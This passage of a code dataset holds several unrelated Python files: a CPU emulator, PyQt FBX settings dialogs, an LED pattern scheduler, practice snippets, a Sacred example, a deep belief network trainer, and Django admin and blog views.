self.reg[reg_a] += 1\n self.reg[reg_a] = self.reg[reg_a] & LIM\n elif op == \"DEC\": # DEC\n self.reg[reg_a] -= 1\n self.reg[reg_a] = self.reg[reg_a] & LIM\n elif op == \"CMP\":\n if self.reg[reg_a] == self.reg[reg_b]:\n self.flag = HLT\n elif self.reg[reg_a] < self.reg[reg_b]:\n self.flag = 0b00000100\n elif self.reg[reg_a] > self.reg[reg_b]:\n self.flag = 0b00000010\n else:\n raise Exception(\"Unsupported ALU 
operation\")\n\n def ldi(self, reg, val):\n reg = reg & OOI # bitwise AND to prevent out-of-index\n val = val & LIM # bitwise AND to limit values\n self.reg[reg] = val\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n # self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n while self.running:\n # self.trace()\n\n # instruction register\n IR = self.ram_read(self.pc)\n\n # in case the instructions need them\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n\n # perform the actions needed for instruction per the LS-8 spec\n if IR == HLT: # HALT\n self.running = False\n elif IR == LDI: # LOAD IMMEDIATE\n self.reg[operand_a] = operand_b\n self.pc += 3\n elif IR == PRN: # PRINT\n print(self.reg[operand_a])\n self.pc += 2\n elif IR == ADD: # ADD\n self.alu(\"ADD\", operand_a, operand_b)\n self.pc += 3\n elif IR == SUB: # SUBTRACT\n self.alu(\"SUB\", operand_a, operand_b)\n self.pc += 3\n elif IR == MUL: # MULTIPLY\n self.alu(\"MUL\", operand_a, operand_b)\n self.pc += 3\n elif IR == CMP:\n self.alu(\"CMP\", operand_a, operand_b)\n self.pc += 3\n elif IR == JMP:\n self.pc = self.reg[operand_a]\n elif IR == JEQ:\n if self.flag == HLT:\n self.pc = self.reg[operand_a]\n else:\n self.pc += 2\n elif IR == JNE:\n if self.flag != HLT:\n self.pc = self.reg[operand_a]\n else:\n self.pc += 2\n elif IR == PUSH:\n # decrement the stack pointer\n self.reg[self.sp] -= 1\n # store the value at that address\n self.ram_write(self.reg[operand_a], self.reg[self.sp])\n # increment the program counter\n self.pc += 2\n elif IR == POP:\n # take the value that is stored at the top of the stack\n self.reg[operand_a] = self.ram_read(self.reg[self.sp])\n # increment the stack pointer\n self.reg[self.sp] += 1\n # increment the program counter\n self.pc += 2\n elif IR == CALL:\n # decrement the stack pointer\n self.reg[self.sp] -= 1\n # push the address of the instruction after it onto the stack\n self.ram_write(self.pc + 2, self.reg[self.sp])\n # move the program counter to the subroutine address\n self.pc = self.reg[operand_a]\n elif IR == RET:\n # pop the addr off the stack and store it in the prog counter\n self.pc = self.ram_read(self.reg[self.sp])\n # increment the stack pointer\n self.reg[self.sp] += 1\n else:\n print(\"Instruction not valid\")\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"477363338","text":"\"\"\"Stuff\n\nTODO create IO settings object widget and create that as an optional dialog\n object widget should simplify options\n create import version and export version\n\n\"\"\"\n\nimport fbx\n\nimport sys\n\nfrom brenpy.qt.bpQtImportUtils import QtWidgets\nfrom brenpy.qt.bpQtImportUtils import QtGui\n\nfrom brenfbx.core import bfIO\nfrom brenfbx.core import bfCore\n\nfrom brenfbx.qt.property import bfQtPropertyTreeWidgets\nfrom brenfbx.items import bfPropertyItems\nfrom brenfbx.qt.property import bfQtPropertyModels\n\n\n\nclass BfIOSettingsDialog(\n # bpDebug.BpDebugObject,\n bfCore.BfManagerBase,\n # QtWidgets.QWidget\n QtWidgets.QDialog\n):\n \"\"\"\n TODO xml methods\n 
\"\"\"\n\n def __init__(self, fbx_manager, parent=None):\n super(BfIOSettingsDialog, self).__init__(fbx_manager, parent=parent)\n\n self._settings = fbx.FbxIOSettings.Create(\n self.fbx_manager(), fbx.IOSROOT\n )\n\n self.apply_default_title()\n self._create_xml_menu()\n self._create_widgets()\n self._create_layout()\n\n self._menu_btn.setAutoDefault(False)\n self._ok_button.setDefault(True)\n\n width = 500\n height = 700\n\n if parent:\n pos = parent.mapToGlobal(parent.rect().topLeft())\n\n self.setGeometry(\n pos.x() + 50,\n pos.y() + 50,\n # 0, 0,\n width,\n height\n )\n\n else:\n self.setGeometry(\n 100,\n 100,\n width,\n height\n )\n\n def apply_default_title(self):\n self.setWindowTitle(\"IO Settings\")\n\n def _create_widgets(self):\n\n self._item_manager = bfPropertyItems.BfFbxPropertyTreeItemManager(self.fbx_manager())\n self._item_manager.set_debug_level(self._item_manager.LEVELS.mid())\n self._item_manager.set_fbx_object(self._settings)\n\n self._model = bfQtPropertyModels.BfFbxPropertyModel()\n self._model.set_item_manager(self._item_manager)\n\n # self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeWidget()\n self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeView(self.bf_environment())\n self._properties_widget.set_use_deligate(True)\n self._properties_widget.setModel(self._model)\n self._properties_widget.setColumnHidden(2, True)\n self._properties_widget.setColumnWidth(0, 300)\n\n # buttons\n self._ok_button = QtWidgets.QPushButton(\"OK\")\n self._cancel_button = QtWidgets.QPushButton(\"Cancel\")\n\n # Button signals\n self._ok_button.clicked.connect(self.accept)\n self._cancel_button.clicked.connect(self.reject)\n\n def _create_xml_menu(self):\n # import/export xml btns\n self._menu_btn = QtWidgets.QPushButton(\"...\")\n\n self._menu = QtWidgets.QMenu()\n self._menu_btn.setMenu(self._menu)\n\n _icon = QtGui.QIcon()\n self._import_xml_action = QtWidgets.QAction(_icon, 'Import XML', self)\n self._export_xml_action = QtWidgets.QAction(_icon, 'Export XML', self)\n\n self._menu.addAction(self._import_xml_action)\n self._menu.addAction(self._export_xml_action)\n\n self._import_xml_action.triggered.connect(self.import_xml)\n self._export_xml_action.triggered.connect(self.export_xml)\n\n def _create_layout(self):\n self._lyt = QtWidgets.QVBoxLayout()\n self.setLayout(self._lyt)\n\n self._xml_layout = QtWidgets.QHBoxLayout()\n self._xml_layout.addWidget(self._menu_btn)\n self._xml_layout.addStretch()\n\n self._button_layout = QtWidgets.QHBoxLayout()\n self._button_layout.addWidget(self._ok_button)\n self._button_layout.addWidget(self._cancel_button)\n\n self._lyt.addLayout(self._xml_layout)\n self._lyt.addWidget(self._properties_widget)\n self._lyt.addLayout(self._button_layout)\n\n def settings(self):\n return self._settings\n\n def set_import_mode(self, value):\n if value:\n import_property = self._settings.FindProperty(\"Import\")\n self._model.set_root_fbx_property(import_property)\n self.setWindowTitle(\"Import Settings\")\n self._properties_widget.expandAll()\n else:\n self._model.set_root_fbx_property(None)\n self.apply_default_title()\n\n def set_export_mode(self, value):\n if value:\n export_property = self._settings.FindProperty(\"Export\")\n self._model.set_root_fbx_property(export_property)\n self.setWindowTitle(\"Export Settings\")\n self._properties_widget.expandAll()\n else:\n self._model.set_root_fbx_property(None)\n self.apply_default_title()\n\n def import_xml(self):\n\n file_path, file_type = QtWidgets.QFileDialog.getOpenFileName(\n 
self,\n 'Import XML file',\n # self._default_path,\n None,\n \"xml files (*.xml)\"\n )\n\n if file_path == \"\":\n return\n\n\n self._model.beginResetModel()\n res = self._settings.ReadXMLFile(file_path)\n # self.item_manager().rebuild()\n self._model.endResetModel()\n self._properties_widget.expandAll()\n\n return res\n\n def export_xml(self):\n file_path, file_type = QtWidgets.QFileDialog.getSaveFileName(\n self,\n 'Export XML file',\n # self._file_path or self._default_path,\n None,\n \"xml files (*.xml)\"\n )\n\n if file_path == \"\":\n return False\n\n res = self._settings.WriteXMLFile(file_path)\n return res\n\n\nclass BfMergeSettingsDialog(\n # bpDebug.BpDebugObject,\n bfCore.BfManagerBase,\n # QtWidgets.QWidget\n QtWidgets.QDialog\n):\n \"\"\"\n \"\"\"\n\n def __init__(self, fbx_manager, parent=None, *args, **kwargs):\n super(BfMergeSettingsDialog, self).__init__(fbx_manager, parent=parent, *args, **kwargs)\n\n self.setWindowTitle(\"Merge Settings\")\n\n self._settings = bfIO.BfMergeSettingsObject.create(self.fbx_manager(), \"mergeSettings\")\n self.add_debug_object(self._settings)\n\n self._create_widgets()\n self._create_layout()\n\n self._ok_button.setDefault(True)\n\n width = 500\n height = 700\n\n if parent:\n pos = parent.mapToGlobal(parent.rect().topLeft())\n\n self.setGeometry(\n pos.x() + 50,\n pos.y() + 50,\n # 0, 0,\n width,\n height\n )\n\n else:\n self.setGeometry(\n 100,\n 100,\n width,\n height\n )\n\n def _create_widgets(self):\n\n self._item_manager = bfPropertyItems.BfFbxPropertyTreeItemManager(self.fbx_manager())\n self.add_debug_object(self._item_manager)\n\n self._item_manager.set_fbx_object(self._settings.fbx_object())\n\n self._model = bfQtPropertyModels.BfFbxPropertyModel()\n self._model.set_item_manager(self._item_manager)\n\n # self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeWidget()\n self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeView(self.bf_environment())\n self._properties_widget.set_use_deligate(True)\n self.add_debug_object(self._properties_widget)\n\n self._properties_widget.setModel(self._model)\n self._properties_widget.setColumnHidden(2, True)\n self._properties_widget.setColumnWidth(0, 300)\n self._properties_widget.expandAll()\n\n # buttons\n self._ok_button = QtWidgets.QPushButton(\"OK\")\n self._cancel_button = QtWidgets.QPushButton(\"Cancel\")\n\n # Button signals\n self._ok_button.clicked.connect(self.accept)\n self._cancel_button.clicked.connect(self.reject)\n\n def _create_layout(self):\n self._lyt = QtWidgets.QVBoxLayout()\n self.setLayout(self._lyt)\n\n self._button_layout = QtWidgets.QHBoxLayout()\n self._button_layout.addWidget(self._ok_button)\n self._button_layout.addWidget(self._cancel_button)\n\n self._lyt.addWidget(self._properties_widget)\n self._lyt.addLayout(self._button_layout)\n\n def settings(self):\n return self._settings\n\nclass Test1(object):\n def __init__(self):\n self.fbx_manager = fbx.FbxManager.Create()\n\n self._widget = BfIOSettingsDialog(self.fbx_manager)\n self._widget.set_import_mode(True)\n\n self._widget.show()\n\n\nif __name__ == \"__main__\":\n # test_1()\n\n app = QtWidgets.QApplication(sys.argv)\n\n test = Test1()\n\n sys.exit(app.exec_())\n","sub_path":"python/brenfbx/qt/dialog/bfIOSettingsDialogs.py","file_name":"bfIOSettingsDialogs.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"211500244","text":"#!/usr/bin/env python3\nimport time\nimport random\nfrom timeit import 
default_timer\n\nfrom auxiliary import RGB\nfrom patternhandler import PatternHandler\n\n# Pattern Import\nfrom pattern.positionslichter import Positionslichter\nfrom pattern.flicker import Flicker, noise_flicker\nfrom effect.lightrun import LightRun\nfrom effect.sparkle import Sparkle\nfrom effect.sweepglow import Sweep\nfrom effect.glow import gloweffect, glowtail\nfrom effect.reveal import reveal\nfrom pattern.bodyglow import RedSparkl, Rainbowbody, Rainbowsweep\n# from effect.glow import *\n\n\nclass Mainclass:\n    def __init__(self):\n        self.api = PatternHandler()\n        self.api.start()\n        self.clock = Clock()\n\n    def flicker_and_lightrun(self, duration):\n        flicker = Flicker()\n        flicker.set_brightness(0.4)\n        # flicker.fade(0.7)\n        self.api.runPattern(flicker)\n        self.clock.start()\n        while self.clock.wait(duration):\n            effect = LightRun()\n            self.api.runPattern(effect)\n            time.sleep(5)\n        self.api.stopPattern(flicker)\n\n    def red_and_sparkle(self, duration):\n        red = RedSparkl()\n        red.set_brightness(0.7)\n        self.api.runPattern(red)\n        self.clock.start()\n        while self.clock.wait(duration):\n            sleeptime = random.randint(15, 60)\n            print(\"Thunderstorm in {} seconds\".format(sleeptime))\n            time.sleep(sleeptime)\n            effect = Sparkle()\n            self.api.runPattern(effect)\n\n        self.api.stopPattern(red)\n\n    def sweep_and_glow(self, duration):\n        takt = 1.1\n        self.clock.start()\n        pos = 0\n        while self.clock.wait(duration):\n            color1 = RGB.wheel(pos)\n            color2 = RGB.wheel(pos + 100)\n\n            effect = Sweep(color1)\n            effect.fade(0.9)\n            self.api.runPattern(effect)\n            time.sleep(takt)\n\n            effect = gloweffect(range(150), color1, color2, int(2.3 * takt * 60))\n            self.api.runPattern(effect)\n            time.sleep(3 * takt)\n\n            pos = (pos + 40) % 255\n\n    def reveal(self, duration):\n        self.clock.start()\n        while self.clock.wait(duration):\n            effect = reveal()\n            effect.fade(0.998)\n            self.api.runPattern(effect)\n            effect.wait_for()\n            time.sleep(3)\n\n    def whitenoise(self, duration):\n        pat = noise_flicker()\n        self.api.runPattern(pat)\n        self.clock.start()\n        while self.clock.wait(duration):\n            time.sleep(10)\n\n        self.api.stopPattern(pat)\n\n    def rainbow(self, duration):\n        pat1 = Rainbowbody()\n        pat2 = Rainbowsweep()\n        self.api.runPattern(pat1)\n        self.api.runPattern(pat2)\n\n        self.clock.start()\n        while self.clock.wait(duration):\n            wait = random.randint(5, 15)\n            time.sleep(wait)\n            effect = glowtail()\n\n            self.api.runPattern(effect)\n\n        self.api.stopPattern(pat1)\n        self.api.stopPattern(pat2)\n\n    def run(self):\n        poslichter = Positionslichter()\n        self.api.runPattern(poslichter)\n\n        duration = 90\n\n        while True:\n            self.api.setFramerate(60)\n            # self.rainbow(duration)\n            # self.whitenoise(duration)\n            self.flicker_and_lightrun(duration)\n            self.red_and_sparkle(duration)\n            self.sweep_and_glow(duration)\n            self.reveal(duration)\n\n        self.api.stopPattern(poslichter)\n        self.api.stop()\n\n\nclass Clock:\n    def __init__(self):\n        self.starttime = default_timer()\n\n    def start(self):\n        self.starttime = default_timer()\n\n    def wait(self, seconds):\n        now = default_timer()\n        diff = now - self.starttime\n\n        if diff > seconds:\n            return False\n        else:\n            return True\n\n\nif __name__ == \"__main__\":\n    main = Mainclass()\n    main.run()\n","sub_path":"source/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
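The Clock helper at the bottom of program.py drives every `while self.clock.wait(duration)` loop above: `start()` stamps `default_timer()` and `wait(seconds)` stays True until that many seconds have elapsed. A minimal usage sketch (illustrative only; the 2-second budget and 0.5-second step are assumed values):

```python
# Minimal usage sketch of the Clock pattern from program.py.
import time
from timeit import default_timer

class Clock:
    def __init__(self):
        self.starttime = default_timer()

    def start(self):
        self.starttime = default_timer()

    def wait(self, seconds):
        # True while fewer than `seconds` seconds have elapsed since start().
        return (default_timer() - self.starttime) <= seconds

clock = Clock()
clock.start()
while clock.wait(2):
    time.sleep(0.5)        # stand-in for running one lighting effect
print("2 second budget elapsed")
```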
+{"seq_id":"642710606","text":"import sys\n\ni = int()\nj = 1\nprint(sys.getsizeof(i))\nprint(sys.getsizeof(j))\n\n# str = \"This is a String\"\n# foo = 1\n# bar = str(foo)\n# print(bar) # ==> problem here\n\na = [1,2]\nprint(a.count(1))\ncount = 1\nprint(a.count(1))\n\nA = [[1, 3, 7],\n     [4, 8, 1]]\n\nr, (c, l) = max(map(lambda t: (t[0], max(enumerate(t[1]), key=lambda v: v[1])), enumerate(A)), key=lambda v: v[1][1])\n\n\n\n# this works\ndef matrix_max_index(M, m, n):\n    max_val = M[0][0]\n    max_val_index = (0, 0)\n    for i, row in enumerate(M):\n        if max(row) > max_val:\n            max_val = max(row)\n            max_val_index = i, row.index(max_val)\n    return max_val_index\n\nnums = input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n    current_row_strings = input().split()\n    M.append([])\n    for j in range(0,n):\n        M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)\n\n\n#v2\ndef matrix_max_index(M, m, n):\n    max_val = max_row = None\n    for i, row in enumerate(M):\n        if max_val is None or max(row) > max_val:\n            max_val = max(row)\n            max_row = i\n    return max_row, M[max_row].index(max_val)\n\nnums = input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n    current_row_strings = input().split()\n    M.append([])\n    for j in range(0,n):\n        M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)\n\n\n# v3\ndef matrix_max_index(M, m, n):\n    max_val, max_row = M[0][0], 0\n    for i, row in enumerate(M):\n        local_max = max(row)\n        (max_val, max_row) = (local_max, i) if local_max > max_val else (max_val, max_row)\n    return max_row, M[max_row].index(max_val)\n\nnums = input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n    current_row_strings = input().split()\n    M.append([])\n    for j in range(0,n):\n        M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"207681455","text":"# coding=utf-8\n\n\"\"\"\n\n\"\"\"\n\nfrom __future__ import division, print_function, unicode_literals\nfrom sacred import Experiment\n\n# create an experiment and name it\nex = Experiment(\"hello_config_scope\")\n\n# A ConfigScope is a function decorated with @ex.config\n# All variables of this function will be put into the configuration\n\n@ex.config\ndef cfg(_log):\n    greeting = \"Hello\"\n    recepient = \"Prithvi\"\n    message = f\"{greeting}! {recepient}\"\n\n\n# We can access all the variables defined in the @ex.config function\n@ex.automain\ndef main(message):\n    print(message)  # OKAY\n    print(greeting)  # ERROR: greeting is not passed to this function\n\n","sub_path":"flashSwift/sacred/03_hello_config_scope.py","file_name":"03_hello_config_scope.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"35592615","text":"import math\n\nimport numpy as np\nimport tensorflow as tf\nfrom rbm import RBM\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass NN(object):\n    '''\n    The feed-forward network used for prediction.\n    '''\n    def __init__(self, sizes, X, Y):\n        # Initialize hyperparameters\n        self._sizes = sizes\n        self._X = X\n        self._Y = Y\n        self.w_list = []\n        self.b_list = []\n        self._learning_rate = 1.0\n        self._momentum = 0.0\n        self._epoches = 100\n        self._batchsize = 100\n        input_size = X.shape[1]\n\n        # Initialization loop over all layers\n        for size in self._sizes + [Y.shape[1]]:\n            # Parameters for each RBM layer plus one output layer\n            max_range = 4 * math.sqrt(6. / (input_size + size))\n\n            # Initialize weights from a uniform random distribution\n            self.w_list.append(np.random.uniform( -max_range, max_range, [input_size, size]).astype(np.float32))\n\n            # Initialize biases to zero\n            self.b_list.append(np.zeros([size], np.float32))\n            input_size = size\n\n    def load_from_rbms(self, dbn_sizes,rbm_list):\n        # Load weights and biases from the pretrained RBMs\n        for i in range(len(self._sizes)):\n            # Copy the weights of the first n-1 layers\n            self.w_list[i] = rbm_list[i].w\n            self.b_list[i] = rbm_list[i].hb\n\n    def train(self):\n        # Start training\n        _a = [None] * (len(self._sizes) + 2)\n        _w = [None] * (len(self._sizes) + 1)\n        _b = [None] * (len(self._sizes) + 1)\n        _a[0] = tf.placeholder(\"float\", [None, self._X.shape[1]])\n        y = tf.placeholder(\"float\", [None, self._Y.shape[1]])\n\n        # Define the variables and the training error\n        for i in range(len(self._sizes) + 1):\n            _w[i] = tf.Variable(self.w_list[i])\n            _b[i] = tf.Variable(self.b_list[i])\n        for i in range(1, len(self._sizes) + 2):\n            _a[i] = tf.nn.sigmoid(tf.matmul(_a[i - 1], _w[i - 1]) + _b[i - 1])\n\n        # Define the loss function\n        cost = tf.reduce_mean(tf.square(_a[-1] - y))\n\n        train_op = tf.train.MomentumOptimizer(self._learning_rate, self._momentum).minimize(cost)\n\n        # Prediction op\n        predict_op = tf.argmax(_a[-1], 1)\n\n        # Training loop\n        with tf.Session() as sess:\n            #Initialize Variables\n            sess.run(tf.global_variables_initializer())\n\n            # Start training\n            for i in range(self._epoches):\n                for start, end in zip(range(0, len(self._X), self._batchsize), range(self._batchsize, len(self._X), self._batchsize)):\n                    sess.run(train_op, feed_dict={_a[0]: self._X[start:end], y: self._Y[start:end]})\n                for j in range(len(self._sizes) + 1):\n                    self.w_list[j] = sess.run(_w[j])\n                    self.b_list[j] = sess.run(_b[j])\n                print(\"Accuracy rating for epoch \" + str(i) + \": \" + str(np.mean(np.argmax(self._Y, axis=1) ==\n                              sess.run(predict_op, feed_dict={_a[0]: self._X, y: self._Y}))))\n\n\n# Load the data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\ntrX, trY, teX, teY = mnist.train.images, mnist.train.labels, mnist.test.images, mnist.test.labels\n# Create 3 RBM models\nRBM_hidden_sizes = [500, 200, 50]\ninpX = trX\n# List holding the trained RBMs\nrbm_list = []\n\n# Number of inputs\ninput_size = inpX.shape[1]\n\n# Train the RBM models greedily, layer by layer\nprint('Pre_train begins!')\nfor i, size in enumerate(RBM_hidden_sizes):\n    print('RBM: ', i, ' ', input_size, '->', size)\n    rbm_list.append(RBM(input_size, size))\n    input_size = size\nfor rbm in rbm_list:\n    print('New RBM:')\n    rbm.train(inpX)\n    inpX = rbm.rbm_outpt(inpX)\nprint('Train begins!')\nnNet = NN(RBM_hidden_sizes, trX, trY)\nnNet.load_from_rbms(RBM_hidden_sizes,rbm_list)\nnNet.train()","sub_path":"Algor/DeepBeliefN/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
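nn.py's load_from_rbms relies on the shapes lining up: each RBM is trained on the hidden activations of the previous one, so its weights slot directly into the feed-forward net. A shape-level sketch of that greedy layer-wise handoff (a pure numpy stand-in with random weights in place of real RBM training; the batch size of 32 is an assumed value):

```python
# Shape-level sketch of the greedy layer-wise handoff in nn.py; random
# weights stand in for actual RBM training.
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

layer_sizes = [784, 500, 200, 50]          # 784 MNIST inputs feeding RBM_hidden_sizes
rng = np.random.default_rng(0)
activations = rng.random((32, layer_sizes[0]))   # stand-in minibatch

pretrained = []
for n_in, n_out in zip(layer_sizes, layer_sizes[1:]):
    w = rng.normal(scale=0.01, size=(n_in, n_out))   # stands in for a trained RBM
    hb = np.zeros(n_out)
    pretrained.append((w, hb))
    activations = sigmoid(activations @ w + hb)      # becomes the next RBM's input

print([w.shape for w, _ in pretrained])  # [(784, 500), (500, 200), (200, 50)]
```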
f\"admin:{c.app_label}_{lc.model}_change\"\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('{}', link_url, linked_obj)\n else:\n if not linked_obj.all():\n return None\n\n lc = ContentType.objects.get_for_model(linked_obj.all()[0])\n view_name = f\"admin:{c.app_label}_{lc.model}_change\"\n m2m_linked_objs = [{\n 'link_url': reverse(view_name, args=[obj.pk]), \n 'link_name': obj.pk,\n } for obj in linked_obj.all()]\n return format_html(', '.join([format_html('{}', obj['link_url'], obj['link_name']) \n for obj in m2m_linked_objs])\n )\n\n _linkify.short_description = field_name # Sets column name\n return _linkify\n\n\nclass SourceAdmin(admin.ModelAdmin):\n def events_count(self, obj):\n return obj.events.count()\n fieldsets = [\n (None, {'fields': ['sid', 'parent', 'title', 'type']}),\n ('Details', {'fields': ['details_formatted']}),\n ]\n list_display = ('sid', linkify(field_name='parent'), 'title', 'type', 'details', 'events_count')\n readonly_fields = ('details', 'details_formatted')\n search_fields = ('sid', 'title',)\n\n\nclass SourceHierarchyAdmin(admin.ModelAdmin):\n fieldsets = [('Hierarchy', {'fields': ['hierarchy_formatted']})]\n readonly_fields = ('hierarchy', 'hierarchy_formatted')\n\n\nclass CharacterAdmin(admin.ModelAdmin):\n def events_count(self, obj):\n return obj.events.count()\n list_display = ('cid', 'cid_redirects', 'real_name', 'events_count', linkify(field_name='events', many=True))\n search_fields = ('cid', )\n\nclass EventAdmin(admin.ModelAdmin):\n list_display = ('eid', 'filename', 'date', 'reality', 'title',\n linkify(field_name='sources', many=True), \n linkify(field_name='characters', many=True), \n linkify(field_name='reflinks', many=True),\n 'desc',\n )\n search_fields = ('eid', 'sources__sid')\n\n\nclass RefAdmin(admin.ModelAdmin):\n list_display = ('rid', 'name', 'desc', 'source')\n search_fields = ('rid', )\n\nclass ReflinkAdmin(admin.ModelAdmin):\n list_display = ('lid', \n linkify(field_name='evt'), \n linkify(field_name='src'), \n linkify(field_name='ref'),\n )\n search_fields = ('lid', 'evt__eid' )\n\nadmin.site.register(Source, SourceAdmin)\nadmin.site.register(SourceHierarchy, SourceHierarchyAdmin)\nadmin.site.register(Character, CharacterAdmin)\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(Ref, RefAdmin)\nadmin.site.register(Reflink, ReflinkAdmin)\n","sub_path":"mcu_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31679466","text":"from urllib.parse import quote_plus\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom .models import Post\nfrom .forms import PostForm\nfrom comments.models import Comment\nfrom comments.forms import CommentForm\n\n\n@login_required\ndef post_create(request):\n\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"Successfuly Created\")\n return HttpResponseRedirect(f'/{instance.slug}/')\n\n button_variables = \"Create\"\n context = {\n 'form': form,\n 
'button_variables': button_variables\n }\n return render(request, 'post_form.html', context)\n\n\ndef post_detail(request, slug):\n today = timezone.now().date()\n instance = get_object_or_404(Post, slug=slug)\n if instance.publish > timezone.now().date() or instance.draft:\n if not request.user.is_authenticated or not request.user.is_staff or not request.user.is_superuser:\n raise Http404\n\n initial_data = {\n \"content_type\": instance.get_content_type,\n \"object_id\": instance.id\n }\n comment_form = CommentForm(request.POST or None, initial=initial_data)\n if comment_form.is_valid():\n c_type = comment_form.cleaned_data.get(\"content_type\")\n\n content_type = ContentType.objects.get(model=c_type)\n object_id = comment_form.cleaned_data.get(\"object_id\")\n content = comment_form.cleaned_data.get(\"content\")\n parent_obj = None\n try:\n parent_id = int(request.POST.get(\"parent_id\"))\n except:\n parent_id = None\n\n if parent_id:\n parent_qs = Comment.objects.filter(id=parent_id)\n if parent_qs.exists() and parent_qs.count() == 1:\n parent_obj = parent_qs.first()\n\n new_comment, created = Comment.objects.get_or_create(\n user=request.user,\n content_type=content_type,\n object_id=object_id,\n content=content,\n parent=parent_obj\n )\n\n return HttpResponseRedirect(f'/{instance.slug}/')\n\n comments = instance.comments\n share_string = quote_plus(instance.content)\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"share_string\": share_string,\n \"today\": today,\n \"comment_form\": comment_form,\n \"comments\": comments,\n }\n return render(request, 'post_detail.html', context)\n\n\ndef post_list(request):\n today = timezone.now().date()\n query_list = Post.objects.active()\n\n if request.user.is_staff or request.user.is_superuser:\n query_list = Post.objects.all().order_by('-timestamp')\n\n search = request.GET.get('search')\n if search:\n query_list = query_list.filter(\n Q(title__icontains=search) or\n Q(content__icontains=search)\n ).distinct()\n paginator = Paginator(query_list, 6)\n page_request_var = \"page\"\n page = request.GET.get(page_request_var)\n query_set = paginator.get_page(page)\n\n context = {\n \"title\": \"My User List\",\n \"object_list\": query_set,\n \"page_request_var\": page_request_var,\n \"today\": today\n }\n\n return render(request, 'post_list.html', context)\n\n\n@login_required\ndef post_update(request, slug):\n\n instance = get_object_or_404(Post, slug=slug)\n\n if request.user == instance.user or request.user.is_superuser:\n form = PostForm(request.POST or None, request.FILES or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, \"Post Updated\")\n return HttpResponseRedirect(f'/{instance.slug}/')\n else:\n raise Http404(\"You Dont Have Permission to delete this post\")\n\n button_variables = \"Update\"\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"button_variables\": button_variables,\n \"form\": form\n }\n return render(request, 'post_form.html', context)\n\n\n@login_required\ndef post_delete(request, slug):\n\n instance = get_object_or_404(Post, slug=slug)\n\n if request.user == instance.user or request.user.is_superuser:\n instance.delete()\n messages.success(request, \"Successfuly Deleted\")\n return redirect('posts:list')\n else:\n raise Http404(\"You Dont Have Permission to delete this 
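# Note on the Q expressions in post_list above: Q objects must be combined
# with the | operator. Python's `or` short-circuits to the first truthy
# operand, so `Q(title__icontains=search) or Q(content__icontains=search)`
# evaluates to just the title clause and silently drops the content filter,
# while `Q(title__icontains=search) | Q(content__icontains=search)` builds a
# single OR node that matches either field.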
